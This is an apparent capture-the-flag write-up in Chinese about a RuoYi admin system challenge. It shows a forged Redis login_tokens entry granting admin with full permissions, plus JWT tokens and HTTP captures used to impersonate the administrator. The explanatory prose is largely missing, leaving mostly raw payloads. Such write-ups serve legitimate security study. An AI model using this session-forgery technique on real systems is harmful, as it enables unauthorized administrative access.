让我们看看这17支战队分别都是谁吧~
xwwei战队仅用5353秒就完成本题的“首杀”,tacesrever战队和xtgo战队不甘落后,紧追其后!
赛题点评
出题团队简介
赛题设计思路
"{\"@type\":\"com.ruoyi.common.core.domain.model.LoginUser\",\"accountNonExpired\":true,\"accountNonLocked\":true,\"browser\":\"Chrome 9\",\"credentialsNonExpired\":true,\"enabled\":true,\"expireTime\":1690354819542,\"ipaddr\":\"117.175.182.182\",\"loginLocation\":\"XX XX\",\"loginTime\":1620354879542,\"os\":\"Windows 10\",\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"permissions\":Set[\"*:*:*\"],\"token\":\"07aaf192-ca8f-4db7-a6a2-ee81dbf07d58\",\"user\":{\"admin\":true,\"avatar\":\"\",\"createBy\":\"admin\",\"createTime\":1620186031000,\"delFlag\":\"0\",\"dept\":{\"children\":[],\"deptId\":103,\"deptName\":\"\xe7\xa0\x94\xe5\x8f\x91\xe9\x83\xa8\xe9\x97\xa8\",\"leader\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"orderNum\":\"1\",\"params\":{\"@type\":\"java.util.HashMap\"},\"parentId\":101,\"status\":\"0\"},\"deptId\":103,\"email\":\"[email protected]\",\"loginDate\":1620186031000,\"loginIp\":\"127.0.0.1\",\"nickName\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"params\":{\"@type\":\"java.util.HashMap\"},\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"phonenumber\":\"15888888888\",\"remark\":\"\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roles\":[{\"admin\":true,\"dataScope\":\"1\",\"deptCheckStrictly\":false,\"flag\":false,\"menuCheckStrictly\":false,\"params\":{\"@type\":\"java.util.HashMap\"},\"roleId\":1,\"roleKey\":\"admin\",\"roleName\":\"\xe8\xb6\x85\xe7\xba\xa7\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roleSort\":\"1\",\"status\":\"0\"}],\"sex\":\"1\",\"status\":\"0\",\"userId\":1,\"userName\":\"admin\"},\"username\":\"admin\"}"
Admin-Token:
eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjMxMDllYzNmLTZlODQtNDhmNS1iYzFmLTRmMzUxZDIzNjMzMyJ9.qKKRIGTkvIIaUnra_zr9D2iUYqfZPpPUGDnmX8A1OVJ-FDYFUrC-m5iNlg9JP0KSLfN2ho1U_SWnLXTnlRUAfQ
{"alg":"HS512"}{"login_user_key":"3109ec3f-6e84-48f5-bc1f-4f351d236111"}
set login_tokens:3109ec3f-6e84-48f5-bc1f-4f351d236333 "{\"@type\":\"com.ruoyi.common.core.domain.model.LoginUser\",\"accountNonExpired\":true,\"accountNonLocked\":true,\"browser\":\"Chrome 9\",\"credentialsNonExpired\":true,\"enabled\":true,\"expireTime\":1690354819542,\"ipaddr\":\"117.175.182.182\",\"loginLocation\":\"XX XX\",\"loginTime\":1620354879542,\"os\":\"Windows 10\",\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"permissions\":Set[\"*:*:*\"],\"token\":\"07aaf192-ca8f-4db7-a6a2-ee81dbf07d58\",\"user\":{\"admin\":true,\"avatar\":\"\",\"createBy\":\"admin\",\"createTime\":1620186031000,\"delFlag\":\"0\",\"dept\":{\"children\":[],\"deptId\":103,\"deptName\":\"\xe7\xa0\x94\xe5\x8f\x91\xe9\x83\xa8\xe9\x97\xa8\",\"leader\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"orderNum\":\"1\",\"params\":{\"@type\":\"java.util.HashMap\"},\"parentId\":101,\"status\":\"0\"},\"deptId\":103,\"email\":\"[email protected]\",\"loginDate\":1620186031000,\"loginIp\":\"127.0.0.1\",\"nickName\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"params\":{\"@type\":\"java.util.HashMap\"},\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"phonenumber\":\"15888888888\",\"remark\":\"\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roles\":[{\"admin\":true,\"dataScope\":\"1\",\"deptCheckStrictly\":false,\"flag\":false,\"menuCheckStrictly\":false,\"params\":{\"@type\":\"java.util.HashMap\"},\"roleId\":1,\"roleKey\":\"admin\",\"roleName\":\"\xe8\xb6\x85\xe7\xba\xa7\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roleSort\":\"1\",\"status\":\"0\"}],\"sex\":\"1\",\"status\":\"0\",\"userId\":1,\"userName\":\"admin\"},\"username\":\"admin\"}"
赛题解析
本赛题解析由看雪论坛 KuCha128 给出:
0x0 寻找可利用之处
0x1 题目框架代码
0x2 分析login_tokens
login_tokens:1794d721-4eb1-4a7e-af46-da6261bf1301
{
"@type":"com.ruoyi.common.core.domain.model.LoginUser",
"accountNonExpired":true,
"accountNonLocked":true,
"browser":"Chrome 9",
"credentialsNonExpired":true,
"enabled":true,
"expireTime":1680912666549,
"ipaddr":"127.0.0.1",
"loginLocation":"内网IP",
"loginTime":1620912726549,
"os":"Windows 10",
"password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2",
"permissions":Set[
"*:*:*"
],
"token":"1794d721-4eb1-4a7e-af46-da6261bf1301",
"user":{
"admin":true,
"avatar":"",
"createBy":"admin",
"createTime":1620902433000,
"delFlag":"0",
"dept":{
"children":[
],
"deptId":103,
"deptName":"研发部门",
"leader":"若依",
"orderNum":"1",
"params":{
"@type":"java.util.HashMap"
},
"parentId":101,
"status":"0"
},
"deptId":103,
"email":"[email protected]",
"loginDate":1620902433000,
"loginIp":"127.0.0.1",
"nickName":"若依",
"params":{
"@type":"java.util.HashMap"
},
"password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2",
"phonenumber":"15888888888",
"remark":"管理员",
"roles":[
{
"admin":true,
"dataScope":"1",
"deptCheckStrictly":false,
"flag":false,
"menuCheckStrictly":false,
"params":{
"@type":"java.util.HashMap"
},
"roleId":1,
"roleKey":"admin",
"roleName":"超级管理员",
"roleSort":"1",
"status":"0"
}
],
"sex":"1",
"status":"0",
"userId":1,
"userName":"admin"
},
"username":"admin"
}
"userName":"admin"
"password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2"
"token":"1794d721-4eb1-4a7e-af46-da6261bf1301"
GET /prod-api/getRouters HTTP/1.1
Host: vue.ruoyi.vip
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjdiMjQ3YzFiLWVmNmYtNGE1MS05OTkxLTc5ODk0NDE5ZjQ4ZCJ9.c9z5AI3a0EpPx7bCStIq2JAsCiZDIKyt0PEE2YVrwyLDUop2N-gxoJKJquCrBJqQY1-DotWG-wKpPIIPMbIGtQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3868.400 QQBrowser/10.8.4394.400
Referer: http://vue.ruoyi.vip/login?redirect=%2Findex
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjdiMjQ3YzFiLWVmNmYtNGE1MS05OTkxLTc5ODk0NDE5ZjQ4ZCJ9.c9z5AI3a0EpPx7bCStIq2JAsCiZDIKyt0PEE2YVrwyLDUop2N-gxoJKJquCrBJqQY1-DotWG-wKpPIIPMbIGtQ
Connection: close
/**
* 令牌前缀
*/
public static final String TOKEN_PREFIX = "Bearer ";
0x3 JSON Web Token(JWT)
一个token分3部分,按顺序为:
*头部(header)
*其为载荷(payload)
*签证(signature)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjIyYmRlZDJmLTNiOTYtNDNlYi1hNmMxLTMzMmExNTY1ZDM2OSJ9.IK5aHWqQDpT5HxNQ_L8F0C_DkCGxNXzzS5Jl0q3iAnEJybQL8cWbPiaaJodjMPkLZEKXhDhNdZFg2lKsaaXsWg
{"login_user_key":"22bded2f-3b96-43eb-a6c1-332a1565d369"}
0x4 开始攻击
HTTP/1.1 200
Server: nginx
Date: Thu, 13 May 2021 17:05:58 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
Content-Length: 228
{"msg":"操作成功","code":200,"token":"eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjIyYmRlZDJmLTNiOTYtNDNlYi1hNmMxLTMzMmExNTY1ZDM2OSJ9.IK5aHWqQDpT5HxNQ_L8F0C_DkCGxNXzzS5Jl0q3iAnEJybQL8cWbPiaaJodjMPkLZEKXhDhNdZFg2lKsaaXsWg"}
0x5 End
参考资料
往期解析
1.看雪·深信服 2021 KCTF 春季赛 | 第二题设计思路及解析
主办方
第四题正在火热进行中,
球分享
球点赞
球在看